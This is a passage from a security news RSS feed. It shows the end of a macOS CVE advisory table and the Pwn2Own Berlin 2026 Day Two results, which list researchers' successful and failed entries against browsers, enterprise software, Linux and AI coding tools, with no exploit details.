    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28944" target="_blank">CVE-2026-28944</a></td>
    <td>WebRTC</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28819" target="_blank">CVE-2026-28819</a></td>
    <td>Wi-Fi</td>
    <td>An app may be able to execute arbitrary code with kernel privileges</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28994" target="_blank">CVE-2026-28994</a></td>
    <td>Wi-Fi</td>
    <td>An attacker in a privileged network position may be able to perform denial-of-service attack using crafted Wi-Fi packets</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28914" target="_blank">CVE-2026-28914</a></td>
    <td>zip</td>
    <td>A maliciously crafted ZIP archive may bypass Gatekeeper checks</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28920" target="_blank">CVE-2026-28920</a></td>
    <td>zlib</td>
    <td>Visiting a maliciously crafted website may leak sensitive data</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
</tbody>
</table>

<img src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyMTAgMTY3Ij4KICA8IS0tIEhvcm5zIC0tPgogIDxwYXRoIGQ9Ik04NSA0IFE3NCA2IDcyIDE4IEw4MCAyMCBRNzkgMTIgODcgOFoiIGZpbGw9IiMxQjJBNEEiLz4KICA8cGF0aCBkPSJNMTI1IDQgUTEzNiA2IDEzOCAxOCBMMTMwIDIwIFExMzEgMTIgMTIzIDhaIiBmaWxsPSIjMUIyQTRBIi8+CiAgPCEtLSBIZWFkIC0tPgogIDxlbGxpcHNlIGN4PSIxMDUiIGN5PSIyMiIgcng9IjE4IiByeT0iMTIiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIExlZnQgdXBwZXIgYXJtIC0tPgogIDxwYXRoIGQ9Ik03MiAzMCBMNTggNDQgTDYzIDQ4IEw3OCAzNVoiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIFJpZ2h0IHVwcGVyIGFybSAtLT4KICA8cGF0aCBkPSJNMTM4IDMwIEwxNTIgNDQgTDE0NyA0OCBMMTMyIDM1WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gWWVsbG93IGJvd3RpZSBsZWZ0IC0tPgogIDxwYXRoIGQ9Ik03NiAzOCBROTAgMzIgMTA1IDM4IFE5MCA0NCA3NiAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIFllbGxvdyBib3d0aWUgcmlnaHQgLS0+CiAgPHBhdGggZD0iTTEzNCAzOCBRMTIwIDMyIDEwNSAzOCBRMTIwIDQ0IDEzNCAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIEJsdWUgY2hlc3QgLS0+CiAgPGVsbGlwc2UgY3g9IjEwNSIgY3k9IjQ2IiByeD0iMTQiIHJ5PSIxMCIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSBsZWZ0IHdpbmcgLS0+CiAgPHBhdGggZD0iTTkxIDU0IFE2MCA1OCAxOCA3NSBRMTAgNjggMTQgNjIgUTUwIDUyIDkxIDU0WiIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSByaWdodCB3aW5nIC0tPgogIDxwYXRoIGQ9Ik0xMTkgNTQgUTE1MCA1OCAxOTIgNzUgUTIwMCA2OCAxOTYgNjIgUTE2MCA1MiAxMTkgNTRaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBHb2xkIGxlZnQgd2luZ3RpcCAtLT4KICA8cGF0aCBkPSJNMTQgNjIgUTQgNjIgMTAgNTQgUTE2IDU4IDE4IDc1WiIgZmlsbD0iI0Y1QjgwMCIvPgogIDwhLS0gR29sZCByaWdodCB3aW5ndGlwIC0tPgogIDxwYXRoIGQ9Ik0xOTYgNjIgUTIwNiA2MiAyMDAgNTQgUTE5NCA1OCAxOTIgNzVaIiBmaWxsPSIjRjVCODAwIi8+CiAgPCEtLSBMb3dlciBib2R5IGxlZnQgc3RydXQgLS0+CiAgPHBhdGggZD0iTTkwIDYyIEw3NiA4NiBMODQgOTAgTDk3IDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gTG93ZXIgYm9keSByaWdodCBzdHJ1dCAtLT4KICA8cGF0aCBkPSJNMTIwIDYyIEwxMzQgODYgTDEyNiA5MCBMMTEzIDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gQmx1ZSB0ZWFyZHJvcCBhYmRvbWVuIC0tPgogIDxwYXRoIGQ9Ik0xMDUgNjggUTExOCA4MiAxMDUgMTA4IFE5MiA4MiAxMDUgNjhaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBMZWZ0IGxvd2VyIGxlZyAtLT4KICA8cGF0aCBkPSJNODAgMTAwIEw2MCAxMTIgTDYyIDExOCBMODQgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gUmlnaHQgbG93ZXIgbGVnIC0tPgogIDxwYXRoIGQ9Ik0xMzAgMTAwIEwxNTAgMTEyIEwxNDggMTE4IEwxMjYgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgo8L3N2Zz4="><span>CVEs marked with the scarab logo were reported through the <strong>TrendAI Zero Day Initiative</strong> program.</span>


  
  









  <p class="">We’ll continue these macOS updates if people find them useful. Stay tuned for the regularly schedule Patch Tuesday blog covering Adobe and Microsoft. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pwn2Own Berlin 2026 - Day Two Results]]></title>
<description><![CDATA[Day Two of Pwn2Own Berlin 2026 and the stakes continue to rise! Security researchers are back on the Pwn2Own stage, pushing enterprise systems to their limits as the competition heats up. More exploits, more surprises, and more standout moments are unfolding, so follow along here for live updates...]]></description>
<link>https://tsecurity.de/de/3694565/hacking/pwn2own-berlin-2026-day-two-results/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694565/hacking/pwn2own-berlin-2026-day-two-results/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:55 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">Day Two of Pwn2Own Berlin 2026 and the stakes continue to rise! Security researchers are back on the Pwn2Own stage, pushing enterprise systems to their limits as the competition heats up. More exploits, more surprises, and more standout moments are unfolding, so follow along here for live updates as the race for Master of Pwn intensifies. There were plenty of big targets on the schedule today, including SharePoint, Exchange, and Safari.</p><p class="">Following an action-packed Day One where $523,000 was awarded for 24 unique 0-day vulnerabilities, Day Two added another $385,750 and 15 unique 0-days, bringing event totals to $908,750 with 39 unique vulnerabilities overall. DEVCORE holds a commanding lead for Master of Pwn with 40.5 points and $405,000, but with one day still to go, anything can happen. Here are the standings as of Day Two but we'll see what the final day of the contest brings. Stay tuned!</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg" data-image-dimensions="1920x1080" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=1000w" width="1920" height="1080" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  





  <p class="">We’ll be posting real-time updates and results throughout the competition right here on our <a href="https://www.zerodayinitiative.com/blog">blog</a> and across social media. Stay up to date by following us on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, and <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a>, and join the conversation using #Pwn2Own Berlin and #P2OBerlin for continuous coverage. </p>





















  
  



<p><b data-preserve-html-node="true">FAILURE</b> - Unfortunately, Tao Yan &amp; Edouard Bochin of Palo Alto Networks could not get their exploit of Apple Safari – Renderer Only working within the time allotted.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">FAILURE</b> - Unfortunately, Stephen Fewer of Rapid7 could not get their exploit of Microsoft SharePoint working within the time allotted.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Ben Koo (@kiddo_pwn) of Team DDOS used a use-after-free bug to escalate privileges on Red Hat Enterprise Linux for Workstations in the second round, earning $10,000 and 1 Master of Pwn point.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg" data-image-dimensions="1767x1330" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=1000w" width="1767" height="1330" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Dialed in! Nikolaos Mourousias (@deltaclock), Caue Obici (@caueobici) &amp; Bruno Halltari (@BrunoModificato) of OtterSec used a Code Injection bug to exploit LM Studio in the second round, earning $20,000 and 4 Master of Pwn points. Full win!</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png" data-image-dimensions="1776x366" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=1000w" width="1776" height="366" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">COLLISON</b> - Although successful on stage, Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting Claude Desktop in the Coding Agent category used a bug that was previously known. They still earn $10,000 and 2 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg" data-image-dimensions="2160x3840" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=1000w" width="2160" height="3840" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Le Duc Anh Vu (@vulda17) of Viettel Cyber Security (@vcslab) exploited Cursor, earning $30,000 and 3 Master of Pwn points. Full win!</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png" data-image-dimensions="5712x4284" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=1000w" width="5712" height="4284" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg" data-image-dimensions="5184x3888" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=1000w" width="5184" height="3888" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">WITHDRAWAL</b> - Kiyong Kwak of Kakaogames and Song Nuri of Samsung Electronics has withdrawn their entry for Apple Safari – Renderer Only in the Web Browser category.</p><p><b data-preserve-html-node="true">FAILURE</b> - Unfortunately, Ruitong of Abstract Team, University of Colorado Boulder could not get their exploit of Red Hat Enterprise Linux for Workstations working within the time allotted.</p><p><b data-preserve-html-node="true">SUCCESS</b> - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) exploited OpenAI Codex in the second round, earning $20,000 and 4 Master of Pwn points.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg" data-image-dimensions="2176x2901" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=1000w" width="2176" height="2901" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
